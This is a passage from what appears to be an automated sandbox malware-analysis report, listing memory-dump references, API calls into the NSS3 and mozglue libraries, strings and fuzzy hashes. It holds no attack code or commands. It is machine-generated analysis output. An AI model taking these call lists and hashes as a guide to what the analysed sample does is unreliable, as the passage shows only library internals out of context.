                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 660648399-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Lock.NSS3 ref: 6C57FD9E
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3(000000FF), ref: 6C57FDB9
                                                                                                                                                                                                                                                        • Part of subcall function 6C45A900: TlsGetValue.KERNEL32(00000000,?,6C5D14E4,?,6C3F4DD9), ref: 6C45A90F
                                                                                                                                                                                                                                                        • Part of subcall function 6C45A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C45A94F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C57FDD4
                                                                                                                                                                                                                                                      • PR_Lock.NSS3 ref: 6C57FDF2
                                                                                                                                                                                                                                                      • PR_NotifyAllCondVar.NSS3 ref: 6C57FE0D
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C57FE23
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3365241057-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_NewMonitor.NSS3(00000000,?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506846
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: calloc.MOZGLUE(00000001,0000019C,?,6C4615C2,?,?,?,?,?,00000001,00000040), ref: 6C46178D
                                                                                                                                                                                                                                                      • PR_NewMonitor.NSS3(00000000,?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506855
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C4755D0,00000000,00000000), ref: 6C4C868B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C4C86A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C4C86B2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C4C86C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C4C86E2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C4C86EC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C4C8700
                                                                                                                                                                                                                                                      • PR_NewMonitor.NSS3(?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C50687D
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618DE
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618F1
                                                                                                                                                                                                                                                      • PR_NewMonitor.NSS3(?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C50688C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618FC
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C46198A
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C5068A5
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C5068B4
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 200661885-0
                                                                                                                                                                                                                                                      • Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                                                      • Instruction ID: 945f75ac4882d703893fb63a1888388a182236160d0d4d7e057436d2d442f703
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1701FBB0B01F0746E751AB764C20BE7B6E46F41299F10043E8869C6A40EF71D4488FA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C45AFDA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C45AFC4
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C45AFD3
                                                                                                                                                                                                                                                      • unable to delete/modify collation sequence due to active statements, xrefs: 6C45AF5C
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C45AFCE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                                      • API String ID: 632333372-924978290
                                                                                                                                                                                                                                                      • Opcode ID: 056d1ea313f7f48650afc52a04701471a225e6d52d92d6c59e28280c3cdf435e
                                                                                                                                                                                                                                                      • Instruction ID: b33ea77313f702c5ac1db90167997aeb66b982713785292dd4adc0818f3df744
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 056d1ea313f7f48650afc52a04701471a225e6d52d92d6c59e28280c3cdf435e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A91DE71B012158FDB04CF69C850FBEBBF1AF49315F5985A8E865AB791C331AC12CBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C4BFC55
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4BFCB2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4BFDB7
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C4BFDDE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: TlsGetValue.KERNEL32(?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8821
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: TlsGetValue.KERNEL32(?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C883D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: EnterCriticalSection.KERNEL32(?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8856
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C4C8887
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: PR_Unlock.NSS3(?,?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8899
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                                                      • String ID: pkcs11:
                                                                                                                                                                                                                                                      • API String ID: 362709927-2446828420
                                                                                                                                                                                                                                                      • Opcode ID: 57764a7d94d6ff5f2a8f4380b88dc87155d8b5c1a939a19a7c579468ee2cae0c
                                                                                                                                                                                                                                                      • Instruction ID: 04912c9921f86caf619f5ef1bd80765c3a8b0a4b2fc8465d5f5b3cd43085b1af
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57764a7d94d6ff5f2a8f4380b88dc87155d8b5c1a939a19a7c579468ee2cae0c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 805192BDB062119BFB00CE649C80F9A3779AB4135AF150029DD0E7BB51EB31F9059BB2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(00000000,?,?), ref: 6C3FBE02
                                                                                                                                                                                                                                                        • Part of subcall function 6C529C40: memcmp.VCRUNTIME140(?,00000000,6C3FC52B), ref: 6C529D53
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FBE9F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3FBE89
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C3FBE98
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C3FBE93
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcmp$sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 1135338897-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 64737cf1a7c81411f29bcded457492fa96cab55db6600cad63484a4943255aff
                                                                                                                                                                                                                                                      • Instruction ID: 1818aa04d2354000f43be0c5aa805b65b7193723cb6893c1758cce3f78bc5516
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64737cf1a7c81411f29bcded457492fa96cab55db6600cad63484a4943255aff
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E73129B1A046558BC700CF69EC94AABBBA6AF6131CB094954EDA41FA41D371ED06CBE0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6E36
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4E6E57
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6E7D
                                                                                                                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6EAA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                                                      • String ID: nXl
                                                                                                                                                                                                                                                      • API String ID: 3163584228-2538165799
                                                                                                                                                                                                                                                      • Opcode ID: f0e31a45800f5b901f45e93cba575f20178abe0a87d66a7ba2592978003f25f7
                                                                                                                                                                                                                                                      • Instruction ID: c49815f9abc0e5669ee95ebcb9a269d5d8330df0aa218d38ab5b255f374e71b0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0e31a45800f5b901f45e93cba575f20178abe0a87d66a7ba2592978003f25f7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2931B47261061AEADB149E38CC04FD6B7A5AB0931BF12063DD699D6BC1EB30B854CB81
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471EE2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C471D97,?,?), ref: 6C4D1836
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F13
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F37
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,dLGl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F53
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: TimeUtil$Choice_Decode$GeneralizedTime_
                                                                                                                                                                                                                                                      • String ID: dLGl
                                                                                                                                                                                                                                                      • API String ID: 3216063065-398212957
                                                                                                                                                                                                                                                      • Opcode ID: 033f0736f478bf7abbfb1dd6978b088b25c42a7aec4d803f6f7a145453ad6809
                                                                                                                                                                                                                                                      • Instruction ID: 4678c75727577981edfe768bd4cbb2d27b52a444159335b9a39608e6206d7d3d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 033f0736f478bf7abbfb1dd6978b088b25c42a7aec4d803f6f7a145453ad6809
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E215071504256ABC750DE69DD10FDBB7E9AB88699F01092DEC48C3B40F730E659CBE2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C417915,?,?), ref: 6C54A86D
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C417915,?,?), ref: 6C54A8A6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C54A891
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C54A8A0
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C54A89B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 265534de6692c964d8f6495e1dd8bc7a89db153b862d0e5dc2b932c0c2ee718c
                                                                                                                                                                                                                                                      • Instruction ID: 964d37d72cc7f7c7b57013de4fe14943f3d64d1cbe433db0fd695e9eb64c5d1b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 265534de6692c964d8f6495e1dd8bc7a89db153b862d0e5dc2b932c0c2ee718c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6110375A00214ABDB04CF21DC51EAEBBA1FF89314F008438FC094BA80FB34A916CBD6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C460BDE), ref: 6C460DCB
                                                                                                                                                                                                                                                      • strrchr.VCRUNTIME140(00000000,0000005C,?,6C460BDE), ref: 6C460DEA
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C460BDE), ref: 6C460DFC
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C460BDE), ref: 6C460E32
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • %s incr => %d (find lib), xrefs: 6C460E2D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                                                      • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                                                      • API String ID: 97259331-2309350800
                                                                                                                                                                                                                                                      • Opcode ID: d7a6838a5388767d17cfb8320a39263042500360c41345fa392516e00ae42e13
                                                                                                                                                                                                                                                      • Instruction ID: 0ead000c01a93c8b4b947bcab1bea45ccdaaf1f3bf4255ba57cf3543ef1b12b1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7a6838a5388767d17cfb8320a39263042500360c41345fa392516e00ae42e13
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701B1726016209FE620DB25DC45E2773B8DF86A09B0544ADE909D3B42E7A1FC158AE5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC2D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC44
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC59
                                                                                                                                                                                                                                                      • free.MOZGLUE(8CB6FF01,6C4F6AC6,?,?,?,?,?,?,?,?,?,?,6C505D40,00000000,?,6C50AAD4), ref: 6C51AC62
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                      • String ID: @]Pl
                                                                                                                                                                                                                                                      • API String ID: 1595327144-545999589
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C409CF2
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C409D45
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C409D8B
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C409DDE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                      • String ID:
